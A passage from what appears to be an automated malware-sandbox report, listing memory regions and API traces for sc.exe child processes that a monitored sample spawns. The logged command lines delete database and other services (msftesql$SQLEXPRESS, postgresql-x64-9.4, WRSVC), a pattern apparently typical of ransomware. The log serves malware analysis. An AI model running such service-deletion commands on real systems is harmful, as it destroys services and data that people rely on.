end_va = 0x1863563fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001863550000" filename = "" Region: id = 1208 start_va = 0x1863570000 end_va = 0x18635effff entry_point = 0x0 region_type = private name = "private_0x0000001863570000" filename = "" Region: id = 1209 start_va = 0x18635f0000 end_va = 0x18635f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018635f0000" filename = "" Region: id = 1210 start_va = 0x1863600000 end_va = 0x1863600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001863600000" filename = "" Region: id = 1211 start_va = 0x1863610000 end_va = 0x1863611fff entry_point = 0x0 region_type = private name = "private_0x0000001863610000" filename = "" Region: id = 1212 start_va = 0x7df5ff450000 end_va = 0x7ff5ff44ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff450000" filename = "" Region: id = 1213 start_va = 0x7ff67ab90000 end_va = 0x7ff67abb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67ab90000" filename = "" Region: id = 1214 start_va = 0x7ff67abb9000 end_va = 0x7ff67abb9fff entry_point = 0x0 region_type = private name = "private_0x00007ff67abb9000" filename = "" Region: id = 1215 start_va = 0x7ff67abbe000 end_va = 0x7ff67abbffff entry_point = 0x0 region_type = private name = "private_0x00007ff67abbe000" filename = "" Region: id = 1216 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1217 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1687 start_va = 0x18637f0000 end_va = 0x18638effff entry_point = 0x0 region_type = private name = "private_0x00000018637f0000" filename = "" Region: id = 1688 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1689 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5502 start_va = 0x1863530000 end_va = 0x186353ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001863530000" filename = "" Region: id = 5503 start_va = 0x1863540000 end_va = 0x1863546fff entry_point = 0x0 region_type = private name = "private_0x0000001863540000" filename = "" Region: id = 5504 start_va = 0x1863620000 end_va = 0x18636ddfff entry_point = 0x1863620000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5505 start_va = 0x18636e0000 end_va = 0x186375ffff entry_point = 0x0 region_type = private name = "private_0x00000018636e0000" filename = "" Region: id = 5506 start_va = 0x1863a50000 end_va = 0x1863a5ffff entry_point = 0x0 region_type = private name = "private_0x0000001863a50000" filename = "" Region: id = 5507 start_va = 0x7ff67aa90000 end_va = 0x7ff67ab8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67aa90000" filename = "" Region: id = 5508 start_va = 0x7ff67abbc000 end_va = 0x7ff67abbdfff entry_point = 0x0 region_type = private name = "private_0x00007ff67abbc000" filename = "" Region: id = 5509 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5510 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5515 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5516 start_va = 0x1863760000 end_va = 0x1863766fff entry_point = 0x0 region_type = private name = "private_0x0000001863760000" filename = "" Region: id = 5517 start_va = 0x18638f0000 end_va = 0x18639cefff entry_point = 0x18638f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5518 start_va = 0x1863770000 end_va = 0x1863781fff entry_point = 0x1863770000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 82 os_tid = 0xd88 [0079.629] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0079.629] __set_app_type (_Type=0x1) [0079.630] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0079.630] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0079.630] SetThreadUILanguage (LangId=0x0) returned 0x409 [0079.659] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0079.659] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0079.659] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0079.659] _wcsicmp (_String1="delete", _String2="query") returned -13 [0079.659] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0079.659] _wcsicmp (_String1="delete", _String2="start") returned -15 [0079.659] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0079.659] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0079.659] _wcsicmp (_String1="delete", _String2="control") returned 1 [0079.659] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0079.659] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0079.659] _wcsicmp (_String1="delete", _String2="config") returned 1 [0079.659] _wcsicmp (_String1="delete", _String2="description") returned -7 [0079.659] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0079.659] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0079.659] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0079.659] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0079.659] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0079.659] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0079.659] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0079.659] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0079.659] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0079.659] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0079.659] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0079.659] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0079.659] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0079.659] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0079.659] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0079.659] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0079.659] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0079.659] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0079.659] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0079.659] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0079.659] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0079.659] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0079.661] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x18637f88e0 [0079.666] OpenServiceW (hSCManager=0x18637f88e0, lpServiceName="msftesql$SQLEXPRESS", dwDesiredAccess=0x10000) returned 0x0 [0079.666] GetLastError () returned 0x424 [0079.666] _ultow (in: _Dest=0x424, _Radix=1667168840 | out: _Dest=0x424) returned="1060" [0079.667] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0079.669] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x18635efa00, nSize=0x2, Arguments=0x18635efa30 | out: lpBuffer="顐捿\x18") returned 0x62 [0079.669] GetFileType (hFile=0x24) returned 0x2 [0079.669] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x18635ef9b0 | out: lpMode=0x18635ef9b0) returned 1 [0079.745] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x18637f9850*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x18635ef9a8, lpReserved=0x0 | out: lpBuffer=0x18637f9850*, lpNumberOfCharsWritten=0x18635ef9a8*=0x62) returned 1 [0079.745] LocalFree (hMem=0x18637f9850) returned 0x0 [0079.745] LocalFree (hMem=0x0) returned 0x0 [0079.745] CloseServiceHandle (hSCObject=0x18637f88e0) returned 1 [0079.746] LocalFree (hMem=0x0) returned 0x0 [0079.746] exit (_Code=1060) Thread: id = 352 os_tid = 0x1350 Process: id = "55" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x5d791000" os_pid = "0xd8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"postgresql-x64-9.4\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1218 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1219 start_va = 0xf876e50000 end_va = 0xf876e6ffff entry_point = 0x0 region_type = private name = "private_0x000000f876e50000" filename = "" Region: id = 1220 start_va = 0xf876e70000 end_va = 0xf876e83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f876e70000" filename = "" Region: id = 1221 start_va = 0xf876e90000 end_va = 0xf876f0ffff entry_point = 0x0 region_type = private name = "private_0x000000f876e90000" filename = "" Region: id = 1222 start_va = 0xf876f10000 end_va = 0xf876f13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f876f10000" filename = "" Region: id = 1223 start_va = 0xf876f20000 end_va = 0xf876f20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f876f20000" filename = "" Region: id = 1224 start_va = 0xf876f30000 end_va = 0xf876f31fff entry_point = 0x0 region_type = private name = "private_0x000000f876f30000" filename = "" Region: id = 1225 start_va = 0x7df5ff740000 end_va = 0x7ff5ff73ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff740000" filename = "" Region: id = 1226 start_va = 0x7ff67a8a0000 end_va = 0x7ff67a8c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a8a0000" filename = "" Region: id = 1227 start_va = 0x7ff67a8cb000 end_va = 0x7ff67a8cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a8cb000" filename = "" Region: id = 1228 start_va = 0x7ff67a8ce000 end_va = 0x7ff67a8cffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a8ce000" filename = "" Region: id = 1229 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1230 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1690 start_va = 0xf877100000 end_va = 0xf8771fffff entry_point = 0x0 region_type = private name = "private_0x000000f877100000" filename = "" Region: id = 1691 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1692 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5649 start_va = 0xf876e50000 end_va = 0xf876e5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f876e50000" filename = "" Region: id = 5650 start_va = 0xf876e60000 end_va = 0xf876e66fff entry_point = 0x0 region_type = private name = "private_0x000000f876e60000" filename = "" Region: id = 5651 start_va = 0xf876f40000 end_va = 0xf876ffdfff entry_point = 0xf876f40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5652 start_va = 0xf877000000 end_va = 0xf87707ffff entry_point = 0x0 region_type = private name = "private_0x000000f877000000" filename = "" Region: id = 5653 start_va = 0xf8770b0000 end_va = 0xf8770bffff entry_point = 0x0 region_type = private name = "private_0x000000f8770b0000" filename = "" Region: id = 5654 start_va = 0x7ff67a7a0000 end_va = 0x7ff67a89ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a7a0000" filename = "" Region: id = 5655 start_va = 0x7ff67a8cc000 end_va = 0x7ff67a8cdfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a8cc000" filename = "" Region: id = 5656 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5657 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5667 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5669 start_va = 0xf877080000 end_va = 0xf877086fff entry_point = 0x0 region_type = private name = "private_0x000000f877080000" filename = "" Region: id = 5670 start_va = 0xf877200000 end_va = 0xf8772defff entry_point = 0xf877200000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5671 start_va = 0xf877090000 end_va = 0xf8770a1fff entry_point = 0xf877090000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 83 os_tid = 0xd90 [0080.533] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0080.533] __set_app_type (_Type=0x1) [0080.533] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0080.533] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0080.533] SetThreadUILanguage (LangId=0x0) returned 0x409 [0080.571] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0080.571] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0080.571] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0080.571] _wcsicmp (_String1="delete", _String2="query") returned -13 [0080.571] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0080.571] _wcsicmp (_String1="delete", _String2="start") returned -15 [0080.571] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0080.571] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0080.571] _wcsicmp (_String1="delete", _String2="control") returned 1 [0080.571] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0080.571] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0080.571] _wcsicmp (_String1="delete", _String2="config") returned 1 [0080.571] _wcsicmp (_String1="delete", _String2="description") returned -7 [0080.571] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0080.571] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0080.571] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0080.571] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0080.571] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0080.572] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0080.572] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0080.572] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0080.572] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0080.572] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0080.572] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0080.572] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0080.572] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0080.572] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0080.572] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0080.572] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0080.572] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0080.572] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0080.572] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0080.572] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0080.572] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0080.572] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0080.573] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xf877108ac0 [0080.594] OpenServiceW (hSCManager=0xf877108ac0, lpServiceName="postgresql-x64-9.4", dwDesiredAccess=0x10000) returned 0x0 [0080.594] GetLastError () returned 0x424 [0080.594] _ultow (in: _Dest=0x424, _Radix=1995503128 | out: _Dest=0x424) returned="1060" [0080.594] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0080.596] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xf876f0f5d0, nSize=0x2, Arguments=0xf876f0f600 | out: lpBuffer="顐眐ø") returned 0x62 [0080.596] GetFileType (hFile=0x24) returned 0x2 [0080.596] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xf876f0f580 | out: lpMode=0xf876f0f580) returned 1 [0080.620] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xf877109850*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xf876f0f578, lpReserved=0x0 | out: lpBuffer=0xf877109850*, lpNumberOfCharsWritten=0xf876f0f578*=0x62) returned 1 [0080.621] LocalFree (hMem=0xf877109850) returned 0x0 [0080.621] LocalFree (hMem=0x0) returned 0x0 [0080.621] CloseServiceHandle (hSCObject=0xf877108ac0) returned 1 [0080.621] LocalFree (hMem=0x0) returned 0x0 [0080.621] exit (_Code=1060) Thread: id = 364 os_tid = 0x1380 Process: id = "56" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x63556000" os_pid = "0xd94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"WRSVC\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1231 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1232 start_va = 0x77dc9e0000 end_va = 0x77dc9fffff entry_point = 0x0 region_type = private name = "private_0x00000077dc9e0000" filename = "" Region: id = 1233 start_va = 0x77dca00000 end_va = 0x77dca13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077dca00000" filename = "" Region: id = 1234 start_va = 0x77dca20000 end_va = 0x77dca9ffff entry_point = 0x0 region_type = private name = "private_0x00000077dca20000" filename = "" Region: id = 1235 start_va = 0x77dcaa0000 end_va = 0x77dcaa3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077dcaa0000" filename = "" Region: id = 1236 start_va = 0x77dcab0000 end_va = 0x77dcab0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077dcab0000" filename = "" Region: id = 1237 start_va = 0x77dcac0000 end_va = 0x77dcac1fff entry_point = 0x0 region_type = private name = "private_0x00000077dcac0000" filename = "" Region: id = 1238 start_va = 0x7df5ffdb0000 end_va = 0x7ff5ffdaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffdb0000" filename = "" Region: id = 1239 start_va = 0x7ff67a400000 end_va = 0x7ff67a422fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a400000" filename = "" Region: id = 1240 start_va = 0x7ff67a42d000 end_va = 0x7ff67a42efff entry_point = 0x0 region_type = private name = "private_0x00007ff67a42d000" filename = "" Region: id = 1241 start_va = 0x7ff67a42f000 end_va = 0x7ff67a42ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a42f000" filename = "" Region: id = 1242 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1243 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1693 start_va = 0x77dcc30000 end_va = 0x77dcd2ffff entry_point = 0x0 region_type = private name = "private_0x00000077dcc30000" filename = "" Region: id = 1694 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1695 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5493 start_va = 0x77dc9e0000 end_va = 0x77dc9effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000077dc9e0000" filename = "" Region: id = 5494 start_va = 0x77dc9f0000 end_va = 0x77dc9f6fff entry_point = 0x0 region_type = private name = "private_0x00000077dc9f0000" filename = "" Region: id = 5495 start_va = 0x77dcad0000 end_va = 0x77dcb8dfff entry_point = 0x77dcad0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5496 start_va = 0x77dcb90000 end_va = 0x77dcc0ffff entry_point = 0x0 region_type = private name = "private_0x00000077dcb90000" filename = "" Region: id = 5497 start_va = 0x77dcd60000 end_va = 0x77dcd6ffff entry_point = 0x0 region_type = private name = "private_0x00000077dcd60000" filename = "" Region: id = 5498 start_va = 0x7ff67a300000 end_va = 0x7ff67a3fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a300000" filename = "" Region: id = 5499 start_va = 0x7ff67a42b000 end_va = 0x7ff67a42cfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a42b000" filename = "" Region: id = 5500 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5501 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5511 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5512 start_va = 0x77dcc10000 end_va = 0x77dcc16fff entry_point = 0x0 region_type = private name = "private_0x00000077dcc10000" filename = "" Region: id = 5513 start_va = 0x77dcd70000 end_va = 0x77dce4efff entry_point = 0x77dcd70000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5514 start_va = 0x77dcd30000 end_va = 0x77dcd41fff entry_point = 0x77dcd30000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 84 os_tid = 0xd98 [0079.573] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0079.573] __set_app_type (_Type=0x1) [0079.573] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0079.573] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0079.573] SetThreadUILanguage (LangId=0x0) returned 0x409 [0079.643] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0079.643] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0079.643] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0079.643] _wcsicmp (_String1="delete", _String2="query") returned -13 [0079.643] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0079.643] _wcsicmp (_String1="delete", _String2="start") returned -15 [0079.643] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0079.643] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0079.643] _wcsicmp (_String1="delete", _String2="control") returned 1 [0079.644] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0079.644] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0079.644] _wcsicmp (_String1="delete", _String2="config") returned 1 [0079.644] _wcsicmp (_String1="delete", _String2="description") returned -7 [0079.644] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0079.644] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0079.644] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0079.644] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0079.644] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0079.644] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0079.644] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0079.644] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0079.644] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0079.644] _wcsicmp (_String1="delete", _String2="qfailure") 